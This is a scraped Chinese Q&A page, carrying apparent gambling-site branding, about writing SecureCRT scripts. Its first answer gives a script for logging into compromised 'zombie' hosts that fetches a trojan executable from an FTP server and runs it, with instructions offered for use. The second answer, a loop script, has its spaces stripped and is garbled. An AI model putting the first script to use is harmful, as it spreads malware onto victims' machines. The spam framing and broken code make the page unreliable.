當前位置:ag真人国际官网-ag旗舰厅官方网站 » 編程軟體 » crt打開腳本如何編寫

crt打開腳本如何編寫-ag真人国际官网

發布時間: 2024-07-11 07:16:30

⑴ 求securecrt腳本登陸肉雞

#$language="jscript"
#$interface="1.0"
if(crt.session.connected)
{
crt.screen.waitforstring (">");
crt.screen.send("ftp ftp地址\r");
crt.screen.waitforstring (":");
crt.screen.send("帳號\r");
crt.screen.waitforstring (":");
crt.screen.send("密碼\r");
crt.screen.waitforstring (".");
crt.screen.send("get 木馬.exe c:\\木馬.exe\r");
crt.screen.waitforstring (">");
crt.screen.send("bye\r");
crt.screen.waitforstring (">");
crt.screen.send("c:\\木馬.exe\r");
crt.screen.waitforstring (">");
crt.screen.send("c:\\木馬.exe\r");
}

這樣回自動登陸 ftp 下載木馬 然後 退出ftp 運行木馬`..
再者之前必須要 設置正確securecrt .. ...要將securecrt設置為開啟先登陸telnet 模式..還必須 讓它自動發送回車..帳號密碼也得設置...

⑵ securecrt腳本編寫個無限循環語句、

#$language="vbscript"
#$interface="1.0"

submain
while1
crt.screen.send"1"&vbcr
crt.sleep1000
wend
endsub

以上代碼保存為test.vbs,然後securecrt菜單中選擇「script」 > "run...",選擇此腳本文件運行。

熱點內容
仙境傳說手游腳本 發布:2024-07-17 16:09:24 瀏覽:690
matlab命令窗口和新建腳本 發布:2024-07-17 15:51:26 瀏覽:374
建ftp文件夾 發布:2024-07-17 15:51:26 瀏覽:954
魔獸撿物腳本 發布:2024-07-17 15:27:56 瀏覽:129
開發ip伺服器 發布:2024-07-17 15:24:42 瀏覽:387
安卓系統視頻製作哪個好用 發布:2024-07-17 15:10:47 瀏覽:210
androidapk結構 發布:2024-07-17 15:10:43 瀏覽:945
c語言指針的例子 發布:2024-07-17 15:08:01 瀏覽:768
linuxzcat 發布:2024-07-17 15:02:09 瀏覽:901
賓士編程嗎 發布:2024-07-17 14:57:08 瀏覽:853
网站地图